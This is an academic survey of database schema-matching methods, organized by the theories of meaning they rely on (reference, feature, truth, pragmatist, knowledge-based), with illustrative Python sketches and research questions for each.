Larson et al. (1989): Two attributes have the same meaning if their features are identical.
SSM: Two terms have the same meaning if they are lexically identical or appear as synonyms in the thesaurus.
Matching methods that use linguistic information assume that the meaning encoded in the externally provided dictionary or thesaurus is similar to that held by the method’s users. For example, WordNet (Version 1.7.1) lists the terms product and merchandise as synonymous, while they may in fact be used in different ways and thus have different meanings in the particular integration context (Zhao & Ram, 2004). For example, a company (and its database schema) understands products as the outcome of a development process, sold to business customers and supported by company service teams, whereas
merchandise is understood as things that are sourced externally, sold to consumers, and supported by the supplier. As shown in Table 1, syntactic information, such as data type, optionality, or uniqueness constraints on attributes, is structural information that is extensively used by schema-level matching methods (Bertino et al., 2004; Castano et al., 2001; Gotthard et al., 1992; Hayne & Ram, 1990; Larson, Navathe, & Elmasri, 1989; Lerner, 2000; Mitra et al., 2000; Spaccapietra & Parent, 1994; Zhao & Ram, 2004). These methods assume that syntactic information is related to meaning: The fact that attribute X in schema A is of type integer is assumed to reflect a different meaning than attribute Y in schema B that is of type character. The overall schema structure, that is, the relationships between schema elements, can also be used for schema matching (Bertino et al., 2004; Gotthard et al., 1992; Hayne & Ram, 1990; Melnik et al., 2002; Mitra et al., 2000; Noy & Musen, 2001; Palopoli et al., 2003; T.-L. J. Wang, Zhang, Jeong, & Shasha, 1994; Yeh et al., 2003). The ONION method (Mitra et al.) recognizes the importance of the overall schema structure, and is the exception as the use of structural information is generally limited to local structural relationships, that is, ones that are directly incident on a particular schema element. Another aspect of relevant structural information is the hierarchical nature of some schemata. Table 1 shows a number of methods applicable to hierarchical schemata only. Recent interest in native XML databases and XML document storage allows the exploitation of properties of such hierarchical schemata (Bajaj & Ram, 2003; Bertino et al., 2004; Doan, Domingos, & Halevy, 2001; Noy & Musen, 2001, 2003; Wang et al., 1994).
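As an illustration of the simplest kind of schema-level linguistic matching described above, the following sketch scores element-name pairs by plain string similarity; the schema element names and the 0.7 acceptance threshold are assumptions for illustration only, and real matchers combine this with thesauri and constraint information.

```python
from difflib import SequenceMatcher

schema_a = ["Product", "ProductID", "Component"]
schema_b = ["Article", "SerialNum", "Part", "ProductCode"]

def name_similarity(a: str, b: str) -> float:
    # Ratio of matching characters, ignoring case (a crude stand-in for the
    # lexicographic matchers surveyed above).
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()

candidates = [(a, b, name_similarity(a, b)) for a in schema_a for b in schema_b]
for a, b, score in sorted(candidates, key=lambda c: -c[2]):
    if score >= 0.7:                       # arbitrary cut-off
        print(f"{a:12s} ~ {b:12s} {score:.2f}")

# ProductID ~ ProductCode scores highly, while Product ~ Article does not;
# the latter is exactly the kind of miss that thesaurus-based matchers address.
```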
Instance-Level Methods

Information about database instances can be used in addition to, or instead of, schema-level information. For example, a schema-level matcher may be used to match entity types, and an instance-level matcher may subsequently be used to match attributes (Miller et al., 2001; Berlin & Motro, 2002; Kang & Naughton, 2003; Chua, Chiang, & Lim, 2003; Li, Clifton, & Liu, 2000). Typically, the identification of table columns with similar meaning is based on aggregate instance information, such as value distributions, term frequencies, or averages, that is computed for table columns and used in similarity measures. For example, when two table columns contain the same distribution of values, then the columns are argued to have similar meaning. Machine learning techniques, such as neural networks (Li et al., 2000) or Bayesian learners (Berlin & Motro, 2002; Doan, Madhavan, Dhamankar, Domingos, & Halevy, 2003), and information-retrieval techniques (Su & Gulla, 2006; Su, Hakkarainen, & Brasethvik, 2004) are used to establish characteristic features of an attribute. Instance information for matching is typically used jointly with the matching of schema elements due to the interrelated nature of the two problems. For example, assume that the production database from Figure 1 holds the instance in the table Products (ProductID=32445, Name=WidgetsA, StockLevel=45), while the marketing database holds in the table Articles the instance (SerialNum=89766, Desc=SomeWidget, Amount=45). The two instances cannot be identified as relating to the same physical thing without this being at least partially predicated on an assumed match of schema elements such as Name and Desc, and Article and Product. Instance-level matching methods use information that cannot realistically be used by a human matcher to match schema-level elements such as attributes. The volume of instance data and the number of different aggregate measures to consider make it impossible for unaided humans to take all the information into account. Consequently, instance-based methods alone are unlikely to encapsulate human theories of meaning.
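A minimal sketch of the aggregate-instance idea is to summarize each column by the relative frequency of its values and compare the summaries; the column contents below are invented, and real instance-level matchers rely on far richer statistics and trained learners.

```python
from collections import Counter

def value_distribution(column):
    # Relative frequency of each distinct value in a column.
    counts = Counter(column)
    total = sum(counts.values())
    return {v: c / total for v, c in counts.items()}

def distribution_overlap(col_a, col_b):
    # Shared probability mass of the two value distributions (1.0 = identical).
    da, db = value_distribution(col_a), value_distribution(col_b)
    return sum(min(da.get(v, 0.0), db.get(v, 0.0)) for v in set(da) | set(db))

stock_level = [45, 45, 12, 0, 45]        # hypothetical Products.StockLevel
amount      = [45, 12, 45, 0, 45]        # hypothetical Articles.Amount
price       = [9.99, 14.50, 9.99, 20.0, 5.0]

print(distribution_overlap(stock_level, amount))  # 1.0 -> likely match
print(distribution_overlap(stock_level, price))   # 0.0 -> unlikely match
```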
Empirical Evaluation of Schema-Matching Methods Schema-matching methods are evaluated by comparing their matching results to a set of reference matches (Berlin & Motro, 2002; W. W. Cohen, 2000; Doan et al., 2003; Kang & Naughton, 2003; Lerner, 2000; Noy & Musen, 2003; Palopoli et al., 2003; Su & Gulla, 2006; Su et al., 2004; Yeh et al., 2003; Zhao & Ram, 2004). Performance is assessed in terms of precision (the proportion of matches found by the method that are in the set of reference matches) and recall (the proportion of reference matches found by the method). Only half of the surveyed schema-matching methods have been subjected to experimental evaluation. Reference matches were established either by a single domain expert (Chua et al., 2003; Yeh et al., 2003) or the researchers themselves (Berlin & Motro, 2001, 2002; Doan et al., 2001; Doan et al., 2003; Doan, Madhavan, Domingos, & Halevy, 2002; Zhao & Ram, 2004), or there is no mention about how they were established (Bergamaschi, Castano, Vincini, & Beneventano, 2001; Bright et al., 1994; Castano et al., 2001; W. W. Cohen, 1998, 2000; Noy & Musen, 2001, 2003). Only Melnik et al. (2002), Palopoli et al. (2003), and Su and Gulla (2006) report the use of multiple participants to establish reference matches. These experimental evaluations involving human-based reference matches also do not report the specific task context that those participants were asked to assume when determining the matches, if any. By establishing the reference matches without explicating the theories of meaning held by participants or researchers, these studies are unable to account for potential variations of theories of meaning held by the humans that establish the reference matches. Because of these validity issues that surround the establishment of reference matches, the theory of meaning embodied in the method may not be the same as the theory of meaning held by the human participants who establish the reference matches.
Hence, a method’s performance measures may not be indicative of the true performance of the method, but may simply reflect a mismatch between theories of meaning. Not knowing whether observed performance is the result of problems with the matching method or problems with establishing the reference matches impairs further improvement of the method. Empirical evaluations of some of the existing schema-matching methods can provide indicative information about the theories of meaning that are used by database integrators. As these evaluations compare the method’s performance to a set of reference matches established by humans, and therefore embody human theories of meaning, the evaluation results can also be seen as statements about human construction of meaning. However, these are not systematic empirical studies guided by theory or designed to answer the more general research questions raised in the next section, but are limited and specific to a particular method. Empirical results are discussed further in connection with specific theories of meaning later. To summarize this section, without knowledge of the theories of meaning held by humans, the respective merits and drawbacks of existing schema-matching methods are difficult to evaluate. Identifying and explicating users’ theories of meaning allow the development or selection of appropriate methods that conform to users’ theories of meaning. This identification and explication, in turn, can make the performance of the method more predictable and its matching results more likely to be accepted by the user.
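The precision and recall measures used in these evaluations are straightforward to compute once a set of reference matches is fixed; the correspondences below are placeholders, and the point of the surrounding discussion is precisely that the reference set itself embodies a theory of meaning.

```python
def precision_recall(found, reference):
    """Precision and recall of found matches against human reference matches."""
    found, reference = set(found), set(reference)
    true_positives = found & reference
    precision = len(true_positives) / len(found) if found else 0.0
    recall = len(true_positives) / len(reference) if reference else 0.0
    return precision, recall

reference = {("Product", "Article"), ("ProductID", "SerialNum"), ("Name", "Desc")}
found     = {("Product", "Article"), ("Name", "Desc"), ("StockLevel", "Amount")}

print(precision_recall(found, reference))   # approximately (0.67, 0.67)
```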
A THEORETICAL FOUNDATION FOR SCHEMA MATCHING

Table 2. Positioning existing research in schema matching (the original table also lists prominent proponents of each theory of meaning)

Reference (correspondence): Two terms have the same meaning if they denote the same object or event in the world. Existing techniques: Biskup & Embley (2003), Kang & Naughton (2003), WHIRL, Chua et al. (2003), Automatch, Autoplex, SEMINT, iMapper, GLUE.

Sense, Intension, & Features: Two terms have the same meaning if they can be characterized by the same features. Existing techniques: Biskup & Embley (2003), Chua et al. (2003), Autoplex, Automatch, SEMINT, SSM, Bertino et al. (2004), Larson et al. (1989), DIKE, TESS.

Truth: Two propositions have the same meaning if they are true under the same circumstances.

Effect (early pragmatist): Two terms have the same meaning if their use results in the same outcome.

Intention (late pragmatist): Two terms have the same meaning if their use is intended to have the same result (e.g., two speech acts have the same illocutionary force and propositional content).

Knowledge (networks of beliefs or causal networks): Two terms have the same meaning if they are embedded in the same network of semantic relationships to others within a coherent theory. Existing techniques: Kang & Naughton (2003), GLUE, ATBE, ARTEMIS, ONION, Anchor-PROMPT, Similarity Flooding, DIKE, Yeh et al. (2003).

Prototypes: Two terms have the same meaning if they have the same prototypes and distance metrics. Existing techniques: Autoplex, SEMINT.

Opposites and Analogs: Two terms have the same meaning if they have the same opposites.

Previously, the article argued for the importance of identifying and explicating theories of meaning. It then introduced and described the main characteristics of existing schema-matching methods. In this section, we introduce theories of meaning
from reference disciplines with long traditions in analyzing and defining the concept of meaning: philosophy, psychology, and cognition. For each theory, we discuss how it can be applied to schema matching and identify those schema-matching methods that make use of it. We also raise new research opportunities and pose research questions based on each theory of meaning. While schema-matching methods have traditionally been classified by the type of information they employ (e.g., Batini et al., 1986; Rahm & Bernstein, 2001), this article extends that classification framework with the additional dimension of the theory of meaning. A summary of the positioning of existing theories is given in Table 2. The theories of meaning cannot be categorized by reference discipline as many theories are discussed in more than one. For example, the feature theory of meaning was originally proposed in philosophy (e.g., Russell, 1905, 1956). Based on research in psychology (e.g., Hirsh-Pasek, Reeves, & Golinkoff, 1993), later philosophers adopted a knowledge-based theory of meaning (Kripke, 1980; Putnam, 1975), which subsequently became the foundation for research efforts in cognition (Sowa, 1984). The theories are discussed in the approximate chronological order of their introduction in the reference disciplines. The number of theories of meaning developed during the long history of the reference disciplines is likely as large as the number of their proponents. Consequently, this article can only present the most influential theories. Finer distinctions within the theories are omitted. The article also excludes theories that, while prominent, do not appear operationalizable for use in schema-matching methods. Two prominent theories are excluded by this criterion. First, the theory of meaning as intersubjective understanding (terms have the same meaning if two social actors agree that they have the same meaning; Habermas, 1979, 1981; Toulmin, 1958) suggests a specifically human interpretation of what meaning is. Second, the theory of meaning as metaphor (terms have
the same meaning if they can be described by the same metaphor; Ricoeur, 1976, 1977, 1978) relies on the concept of metaphors, which is an intrinsically human construction. The theories are discussed here, and in the reference disciplines, in isolation. However, this does not preclude the possibility that humans hold and use a combination of theories, or use different theories for different purposes. In fact, the use of multiple theories is an empirical research question that is taken up again later.
Reference Theory of Meaning According to the reference theory of meaning, the meaning of a term is what the term refers to in an extralinguistic domain, that is, outside of language (Russell, 1905; Strawson, 1950). For example, the meaning of the term product is the set of all physical products within a given domain.
Application to Schema Matching When considering the matching of schema-level elements, the reference theory is applied by instance-based matching methods. For example, the term product on the schema level refers to the instances in the Product table and its meaning is the set of these instances. Hence, instance-based matchers implicitly adopt this theory of meaning for matching schema-level elements such as tables or fields (e.g., Doan et al., 2003). The reference theory of meaning is difficult to apply to the matching of instances in database systems as the instances in the database often refer to physical objects, which are not accessible for processing by software. For example, the instance of a product with serial number 123 refers to a physical thing that is not itself in the database. However, in situations where the referents are computational entities, such as electronic documents, Web pages, images, and so forth, these referents may themselves be stored in the database and thus are available to a schema-matching system. For
example, documents may be stored in a database and be classified by some characteristic values. The meaning of each of these values is the set of external documents to which it refers (or in which it occurs). An initial effort in this direction is the iMapper ontology matching tool (Su, Brasethvik, & Hakkarainen, 2003; Su & Gulla, 2004, 2006; Su et al., 2004).
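Under the reference theory, the meaning of a schema element is its set of referents, so one hedged way to operationalize "same meaning" is the overlap of the instance (or referent) sets of two elements; the identifiers below are invented for illustration.

```python
def jaccard(instances_a, instances_b):
    # Overlap of the two referent sets: 1.0 means identical extensions.
    a, b = set(instances_a), set(instances_b)
    return len(a & b) / len(a | b) if a | b else 0.0

# Keys of the things the two tables refer to (e.g., shared serial numbers).
product_refs = {"P-123", "P-124", "P-125", "P-126"}
article_refs = {"P-123", "P-124", "P-125", "P-900"}

print(jaccard(product_refs, article_refs))   # 0.6 -> substantial shared reference
```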
Research Opportunities Despite its implicit adoption by schema-level matchers, many questions remain unanswered. To what degree does the number of common instances influence similarity in perceived meaning? For example, is similarity of meaning linear in the number of common instances? Other questions concern the aggregation of instance information to make the problem computationally feasible. What are appropriate and useful aggregate measures? For example, Berlin and Motro (2002) aggregate instance information to the frequency of values, mutual information values, and so on. W. W. Cohen (2000) also aggregates instance information to the frequency of values, while Chua et al. (2003) do not aggregate but instead use statistical means such as regression to determine the similarity of instances. While computationally more efficient, aggregation always involves loss of information. Research opportunities exist in investigating appropriate aggregation, or, equivalently, acceptable information loss and its influence on human-perceived similarity of meanings. When applying the reference theory of meaning for the matching of instances, as done in the iMapper method (Su et al., 2003; Su & Gulla, 2004, 2006; Su et al., 2004) by means of informationretrieval techniques, other questions arise. For example, text-mining approaches characterize documents by computing an occurrence vector for terms and seek to determine the meaning of terms by the set of documents referring to them. What are appropriate, feasible, and relevant characteristics of external documents for schema
matching? Which words, terms, or other metadata adequately characterize an external file as judged by humans? Should all terms be used, or are some more important than others? Some of these questions have been implicitly addressed by the empirical evaluations of existing schema-matching methods. Because the method’s performance is evaluated relative to a set of reference matches established by humans, the results can be interpreted as being indicative about the construction of meaning by humans. The empirical evaluation of the Automatch method, an instance-based matcher, compares three ways of determining relevant characteristics (mutual information, information gain, and likelihood ratio) and shows no substantial performance differences on reference matches established by humans (Berlin & Motro, 2002). This lack of differences may indicate that distinctions about which values are relevant do not affect the way in which humans construe similarity of meaning and are, therefore, not part of human theories of meaning. However, this study only examined three specific characteristics, so that the above question about appropriate and useful aggregate measures is, to a large extent, still unanswered. In a performance comparison that added synonymy relationships from WordNet to the information-retrieval algorithm in the iMapper method, no increase in precision or recall was observed (Su & Gulla, 2006). This lack of significant results may indicate that humans prefer a reference theory of meaning over one that is based on synonymy (i.e., substitutability in use) when instance information is available. This preference for a reference theory of meaning is compatible with that found by Palopoli et al. (2003). In their DIKE method, synonymy relationships are assigned probabilities or certainties. These were varied in the experimental study, but the matching result showed little change, further indicating that synonymy may not be an important determinant of meaning.
Su and Gulla (2006) also varied the contribution of the feature vectors of subconcepts and related concepts in their study and found little performance difference. This lack of difference may indicate that meaning is created mainly based on the instances of a concept itself, without regard for instances of related concepts. While the empirical studies presented here answer some of the raised research questions in a limited way, the reader should keep in mind that the experimental studies described above are limited to specific method implementations and matching contexts. Furthermore, postulating relationships, or the lack thereof, based on the lack of empirical results is problematic. Thus, more systematic, theory-guided studies are required.
Feature Theory of Meaning

Meaning as reference is associated with a number of problems, leading Frege (1980) to suggest that the meaning of a word or phrase is its sense instead of its referent. Russell (1905, 1956) further defines this sense as a function of the logical operators, predicates, and referents in a phrase. These philosophical foundations have been taken up as the classical view of meaning in the psychology of language, where a concept is defined by a set of necessary and sufficient attributes. For example, the concept of bird would be defined by its ability to fly, to lay eggs, and to have feathers, wings, two legs, and so forth. This listing of characteristics is also termed a feature-based approach (Hirsh-Pasek et al., 1993).
Application to Schema Matching When matching entities or tables (e.g., Gotthard et al., 1992; Hayne & Ram, 1990; Larson et al., 1989), the features are attributes or fields. For example, a database schema may suggest that products are those things that have a ProductID, a
ManufacturingDate, and an optional SellByDate. When matching attributes or fields themselves (e.g., Hayne & Ram; Larson et al.; Li & Clifton, 2000), the features are data types, constraints, and so forth. For example, the field Price is defined as a decimal with three digits that is not null, having a minimum of 10, a maximum of 1,000, and a default of 15. For this example, one can say that Price means all those values that have three decimals, are never null, are always between 10 and 1,000, and have a default of 15. While widely used on the schema level when matching attributes and entities (Gotthard et al., 1992; Hayne & Ram, 1990; Larson et al., 1989; Li & Clifton, 2000; Zhao & Ram, 2004), the feature theory of meaning is not applicable to the instance level. The main difficulty with this approach is that, in practice, entities or attributes are not usually identical but only similar to varying degrees.
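A sketch of the feature-based view: describe each attribute by a small vector of syntactic features and count agreements. The feature set and the equal weighting are assumptions introduced here; actual feature-based methods weight and normalize these comparisons far more carefully.

```python
# Hypothetical feature descriptions of two attribute definitions.
price_a = {"type": "decimal", "nullable": False, "min": 10, "max": 1000, "default": 15}
price_b = {"type": "decimal", "nullable": False, "min": 0,  "max": 1000, "default": None}

def feature_similarity(f1, f2):
    # Fraction of features on which the two attribute definitions agree.
    keys = set(f1) | set(f2)
    agreements = sum(1 for k in keys if f1.get(k) == f2.get(k))
    return agreements / len(keys)

print(feature_similarity(price_a, price_b))   # 0.6: similar, but not identical
```

The fractional score reflects the main difficulty noted above: in practice, attribute definitions are rarely identical, only similar to some degree.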
Research Opportunities In connection with the feature theory of meaning, research questions include determining to what extent similarities and differences, for example, in data type or constraints, are relevant to the meaning as perceived by human users. For example, is the difference between a float and an integer data type relevant when human users apply this theory of meaning? Under what circumstances does such a difference become relevant? Are some features more important than others? Zhao and Ram (2004) concluded from their study that the relevant feature set differs depending on the problem domain. As another example, do humans focus on differences in data types, or differences in relational constraints? How can the similarity of data types (e.g., between integer and float, and between integer and character) be measured, and do such measures correspond to similarities in perceived meaning?
Truth Theory of Meaning Tarski (1935) argues that the meaning of a phrase is the set of conditions under which it is true. Dummett (1993) moderates this position, suggesting that the meaning of a phrase is the set of conditions and type of evidence under which a sentence can be justifiably claimed to be true, that is, its assertability.
Application to Schema Matching This theory of meaning is applicable only at the instance level as assertions are made only on this level. For example, table Product having an instance Foo amounts to asserting that Foo is a product. Instance-level matchers can apply this theory by noting that the situations in which Foo is a product are exactly those in which Foo is an instance of Product. Hence, the meaning of the assertion that Foo is a product is the set of database states in which Foo is an instance of Product. However, this operationalization of the theory of meaning does not yet appear practical as there is currently no way of characterizing the potentially large collection of database states in which this assertion is made. Nevertheless, mining association rules (Agrawal, Imielinski, & Swami, 1993; Fayyad, Piatetsky-Shapiro, Smyth, & Uthurusamy, 1996; Hipp, Güntzer, & Nakhaeizadeh, 2000) may be useful to extract important co-occurrence information. For example, the states in which Foo is an instance of Product may be characterized by the fact that Bar1 and Bar2 are instances of Part when Foo is an instance of Product. The main value of this theory of meaning to schema matching lies in the matching of instances rather than schema elements, as applied, for example, by the WHIRL method (W. W. Cohen, 1998, 2000). While schema elements are merely terms (e.g., Product), inserting an instance into a
table is an assertion (e.g., Foo is a product). When instance-based matchers are used to match schema elements, identification of identical or similar instances is often a prerequisite.
Research Opportunities Only a limited amount of research has been based on the truth theory of meaning. In connection with the truth theory of meaning, research opportunities lie in exploring how to characterize database states using suitable aggregate measures and, based on those characteristics, exploring how similar or identical database states can be identified. For example, characteristics of database states might take the form of frequency distributions of particularly relevant fields or relations (Mannino, Chu, & Sager, 1988), or a set of association rules (Agrawal et al., 1993).
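One hedged way to make the idea of characterizing database states concrete is to summarize a state by the value frequencies of a few designated fields and compare the summaries; which fields to designate and how to compare are exactly the open questions raised above, so the encoding below is purely illustrative.

```python
from collections import Counter

def state_signature(state, fields):
    # Frequency distribution of selected field values in a database state,
    # where a state is modelled as a list of (table, row-dict) pairs.
    sig = Counter()
    for table, row in state:
        for field in fields:
            if field in row:
                sig[(table, field, row[field])] += 1
    return sig

def signature_distance(sig_a, sig_b):
    # Symmetric difference of the two frequency signatures (0 = identical).
    keys = set(sig_a) | set(sig_b)
    return sum(abs(sig_a[k] - sig_b[k]) for k in keys)

state_1 = [("Product", {"Name": "Foo"}), ("Part", {"Name": "Bar1"}), ("Part", {"Name": "Bar2"})]
state_2 = [("Product", {"Name": "Foo"}), ("Part", {"Name": "Bar1"})]

print(signature_distance(state_signature(state_1, ["Name"]),
                         state_signature(state_2, ["Name"])))   # 1
```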
Early Pragmatist Theory of Meaning (Meaning as Effect) The reference and truth theories of meaning are denotational (also called correspondence) theories that suggest that terms (e.g., product) denote (or correspond to) either entities in the world or states of the world. These theories neglect the actual use of terms, which is addressed by pragmatic theories. Early pragmatic theory (Dewey, 1958; Wittgenstein, 1953) focuses on the capacity of words to create intentional effects in the world. The early pragmatist theory is behaviorist in nature; it does not refer to intention but only to the observable effects of the use of the words or sentences. For example, a stop sign is meaningful because of its consequences, and the meaning of the sign is the effect it produces. Consequently, this theory is readily applicable to schema matching. However, no existing schema-matching methods are based on this theory.
Application to Schema Matching Early pragmatist theory of meaning is applicable to both schema-level and instance-level matching by observing effects of the creation of signs. For example, on the schema level, the effects of inserting instances into the table Product determine the meaning of the term product. One might observe that in one database, upon creation of a new instance of Product, new instances of Component are created. If one observes in a second database that whenever an instance of Article is created, new instances of Part are created, one may be justified in claiming that the meanings of Product and Article and the meanings of Component and Part are similar. On the instance level, the meaning of an instance Foo of table Product is determined by the effects the insertion of the specific instance Foo has. These effects include sequences of database operations that occur after a particular instance is created or changed. Alternatively, or in addition, the application software execution following such assertions could be traced. When, on inserting an instance of Product, one finds that in one application system a production scheduling procedure is executed, and in another system, inserting an instance of Article triggers a production scheduling procedure, one may be justified in concluding that Product matches Article. In summary, this theory is an operationalizable theory of meaning that can be applied to schema matching and can bring additional evidence about database effects to bear on the matching problem.
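A sketch of the effect-observation idea: from a hypothetical flat transaction log, collect which operations typically follow an insert into a given table, so that tables with similar effect profiles can be compared. The log contents are fabricated; a real system would obtain this information from the DBMS transaction or recovery log.

```python
from collections import Counter

# Hypothetical ordered transaction log: (operation, table) pairs.
log = [
    ("insert", "Product"), ("insert", "Component"), ("insert", "Component"),
    ("insert", "Article"), ("insert", "Part"), ("insert", "Part"),
    ("insert", "Product"), ("insert", "Component"),
    ("update", "Customer"),
]

def effect_profile(log, table, window=2):
    # Operations observed within `window` steps after an insert into `table`.
    profile = Counter()
    for i, (op, tab) in enumerate(log):
        if op == "insert" and tab == table:
            for later_op in log[i + 1 : i + 1 + window]:
                profile[later_op] += 1
    return profile

print(effect_profile(log, "Product"))   # inserts into Component dominate
print(effect_profile(log, "Article"))   # inserts into Part dominate
```

Similar effect profiles for Product and Article (here, both trigger inserts into a parts-like table) would count as evidence of similar meaning under this theory.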
Research Opportunities Research opportunities exist to explore the kind of effects that are relevant for the creation of meaning. For example, the behavior in the database or application software after an instance is inserted (or updated), for example, Foo, may be observed. This line of research requires identification of a
large number of occurrences of such insert or update actions, and identification of similar sequences of events that follow these actions in the database or software system. Technology to enable monitoring of database transactions, that is, the sequence of insert, update, and select operations, is readily available, for example, by analyzing the transaction or recovery log of databases (e.g., Haerder & Reuter, 1983; Ramakrishnan & Gehrke, 2003). For active databases, user-level logging can be implemented to capture instance operations (e.g., Paton, 1998; Paton & Diaz, 1999). Analysis of such data can make use of association-rule discovery (Agrawal et al., 1993; Fayyad et al., 1996; Hipp et al., 2000) or pattern discovery in sequence data (Ewens & Grant, 2001; Korf, Yandell, & Bedell, 2003; T.-L. J. Wang et al., 1994). Related research includes investigating questions as to what extent the similarity of sequences of effects determines meaning, and how to evaluate the similarity of effect sequences. Other research questions also include the following. What is the relative importance of the effects in the database, the application software, and the real world for determining meaning? Is it more important for human similarity judgment to have similar database operations, or is it more important to have similarity in software application behavior? Are the effects of insert and update operations equally important in creating meaning?
Late Pragmatist Theory of Meaning (Meaning as Intention) Late pragmatist theory (Austin, 1962; Grice, 1989; Searle, 1969) suggests that the meaning of a sentence or utterance is not its actual effect but its intended effect. The creator of a sign or assertion has an intention for himself or herself and others to behave in certain ways. Rather than locating the meaning with the hearer as early pragmatist theory does, late pragmatist theory locates it with the speaker. In contrast to the earlier pragmatist theory, which defined meaning through the
hearer’s interpretation, late pragmatist theory defines it through the speaker’s intention.
Application to Schema Matching The meaning according to the late pragmatist theory of meaning is in the source, not the effects, of data creation and changes. For example, one would ask whether the instances of Product are requests for product development, indications that products are being manufactured, or requests to develop marketing campaigns for products. For example, if one confirms that the majority of insertions into the table Product are done by the applications Marketing and MarketManagement, and insertions into the table Article are done by applications Production and Accounting, one would conclude that Product and Article have dissimilar meanings. In contrast to the early pragmatist theory, which is operationalized by observing the events following a particular database operation, the late pragmatist theory is operationalized by observing the events leading up to a particular database operation. This theory of meaning is, like the early pragmatist theory, readily exploitable by schema-level as well as instance-level matchers. To discover the intention of a sign or statement in the database, for example, product, one can examine what the software application or the user intended by making this statement or creating this sign. Software execution tracing is a mature field (Ball & Larus, 1994; Hamou-Lhdaj & Lethbridge, 2004; Zhang & Gupta, 2005) and can be performed on existing code using aspect-oriented techniques (G. Cohen, 2005). Software execution tracing can be performed at the user-interface level to discover a user’s intended actions (Hilbert & Redmiles, 2000; Sanderson & Fisher, 1994).
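To make the source-oriented (intention) view concrete, the following sketch (an illustration only, under the assumption that an audit trail of (application, operation, table) records is available) characterizes each table by the distribution of applications that insert into it and compares these distributions; all application and table names are made up.

```python
# Hedged sketch: compare the "who inserts here" profiles of two tables.
from collections import Counter
from math import sqrt

def source_profile(audit, table):
    """Relative frequency of inserting applications for one table."""
    apps = Counter(app for app, op, tbl in audit if op == "INSERT" and tbl == table)
    total = sum(apps.values())
    return {app: n / total for app, n in apps.items()}

def cosine(p, q):
    dot = sum(p.get(k, 0.0) * q.get(k, 0.0) for k in p.keys() | q.keys())
    norm = sqrt(sum(v * v for v in p.values())) * sqrt(sum(v * v for v in q.values()))
    return dot / norm if norm else 0.0

audit_db1 = [("Marketing", "INSERT", "Product"), ("MarketManagement", "INSERT", "Product")]
audit_db2 = [("Production", "INSERT", "Article"), ("Accounting", "INSERT", "Article")]
# Disjoint sets of inserting applications suggest dissimilar meanings.
print(cosine(source_profile(audit_db1, "Product"), source_profile(audit_db2, "Article")))  # 0.0
```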
Research Opportunities Research in this area is needed to investigate the relative importance of data creation (i.e., insert
operations and their sources) and data change (i.e., update operations) in the construction of meaning by humans. Other questions concern the traceability of database effects back to software modules. For example, if the database operations come not from a single software module, but from sets of software modules, how can similarities between such sets be measured in a way that they reflect human similarity judgment? To what extent are the frequencies of database operations from different software modules relevant to the judgment of similarity by human users, for example, as part of weighted measures?
Knowledge-Based Theories of Meaning According to the knowledge theory of meaning, terms acquire their meaning through their positions in an underlying causal theory, that is, a network of propositions relating the terms (Kripke, 1980; Lakatos, 1978; Putnam, 1975; Quine, 1953). The theories and propositions may be about general concerns, such as genetics and physics, or about specific concerns, such as the accounting and production management of a particular business. Networks also form the basis for the closely related coherence theory of truth (Davidson, 1986; Putnam, 1981; Rescher, 1973; Young, 2001), according to which two statements have the same meaning if they occupy similar positions in a network of coherent beliefs rather than causal propositions. Knowledge-based theories of meaning in philosophy have informed knowledgebased theories in psychology (e.g., Gopnik, 2001; Gopnik & Wellman, 1994; Hirsh-Pasek et al., 1993; Keil, Smith, Simons, & Levin, 1998; G. L. Murphy, 2002) and are found in the cognitive sciences in the form of semantic network models of knowledge representation (Collins & Loftus, 1975; Collins & Quillian, 1969) and conceptual graphs (Sowa, 1984, 2000).
Application to Schema Matching Every schema is a theory or network of beliefs; each consists of a set of terms related by propositions, for example, “Every product consists of components” (Figure 1). Schema-level matchers apply this theory by establishing similarity measures between two such networks. Rather than matching each schema element individually, the entire schema is matched. Once this is done, elements in similar positions in the matched schema may be assumed to have similar or identical meaning. Rahm and Bernstein (2001) have suggested the use of graph isomorphism techniques for this task. While many schema-matching methods have realized the importance of structural information on a local level, for example, by examining incoming and outgoing relationships of an entity (GLUE, ATBE, ARTEMIS, DIKE; Kang & Naughton, 2003; Melnik et al., 2002; Noy & Musen, 2001; Yeh et al., 2003), overall schema similarity has not received much attention in schema matching.
Research Opportunities Research issues in this area should focus on efficient heuristics for graph isomorphism as the problem is computationally hard (Corneil & Gottlieb, 1970; Lueker & Booth, 1979; Ullmann, 1976). Current graph isomorphism algorithms focus on exact matches, while in the context of schema matching, inexact matching is required; no two schemata are identical. What are appropriate measures of graph similarity that reflect human judgments of similarity of meaning? How can existing graph isomorphism techniques be adapted for inexact matching? Applying graph isomorphism also raises more questions. For example, when matching entity-relationship models, what is the relative importance of matches of entity types, attributes, and relationships? What relative contribution do different types of schema elements make to the meaning of a term? The connections between schema elements, that is, the edges of the
graph, are often of multiple types. Thus, a schema can be conceptualized as a set of graphs. For example, entity-relationship models contain graphs spanned by relationship edges, graphs spanned by attribution edges, and graphs spanned by generalization edges. Can approximate isomorphisms for all graphs be found simultaneously? What determines an optimal match in this situation? What is the relative importance of, for example, relationships and generalizations to the meaning of terms constructed by human users? The importance of the knowledge-based theory of meaning is indicated in the experimental evaluation of the similarity flooding method by Melnik et al. (2002). This method implements schema-level matching based on local structural properties and lexical similarity of terms. In a sensitivity analysis, the influence of the lexical similarity was found to have little effect on performance, indicating that structural information is the dominant theory of meaning of these two.
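As a toy illustration of structural, fixpoint-style matching in the spirit of similarity flooding (this is not Melnik et al.'s algorithm, only a simplified sketch), the code below propagates hypothetical lexical seed similarities along the edges of two small schema graphs; the graphs, seed values, and parameters are assumptions for demonstration.

```python
# Hedged sketch: node-pair similarities are repeatedly reinforced by the
# average similarity of neighbouring node pairs (similarity-flooding-inspired).
from itertools import product

def structural_similarity(g1, g2, seed, rounds=10, alpha=0.5):
    """g1, g2: adjacency dicts; seed: lexical similarities for some node pairs."""
    sim = {(a, b): seed.get((a, b), 0.0) for a, b in product(g1, g2)}
    for _ in range(rounds):
        new = {}
        for a, b in sim:
            neigh = [sim[(x, y)] for x in g1[a] for y in g2[b]] or [0.0]
            new[(a, b)] = alpha * seed.get((a, b), 0.0) + (1 - alpha) * sum(neigh) / len(neigh)
        sim = new
    return sim

# Two tiny entity-relationship graphs (edges = relationships)
g1 = {"Product": ["Component"], "Component": ["Product"]}
g2 = {"Article": ["Part"], "Part": ["Article"]}
seed = {("Product", "Article"): 0.3}            # e.g., from a lexical matcher
scores = structural_similarity(g1, g2, seed)
print(max(scores, key=scores.get))              # ('Product', 'Article')
```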
